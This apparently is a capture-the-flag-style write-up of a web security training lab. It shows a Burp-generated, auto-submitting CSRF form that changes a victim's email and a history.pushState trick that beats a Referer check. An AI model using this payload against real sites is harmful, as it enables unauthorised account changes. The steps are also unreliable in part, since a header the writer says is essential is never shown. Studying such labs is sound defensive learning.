LAB 12 - CSRF with broken Referer validation

Initial instructions

This lab's email change functionality is vulnerable to CSRF. It attempts to detect and block cross domain requests, but the detection mechanism can be bypassed.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.

You can log in to your own account using the following credentials: wiener:peter

First of all lets login with wiener credentials and lets try update its email and intercept this request with Burpsuite.

Now I will generate a CSRF PoC from this intercepted request and send it to the victim.

Now I will go to the exploit server and send it to the victim. To make it work we need to add this where it says history.pushState.

history.pushState('', '', '/YOURLABID');

The request should look something similar to this.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a7a0048031a31b481c87faf00310080.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="bomboclat@bomboclat.xyz" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/0a7a0048031a31b481c87faf00310080.web-security-academy.net');
      document.forms[0].submit();
    </script>
  </body>
</html>

With this lets go to the exploit server and send it to the victim. Here its really important to add that header in the head section. This is because many browsers now strip the query string from the Referer header by default as a security measure.

Congratulations, you solved the lab!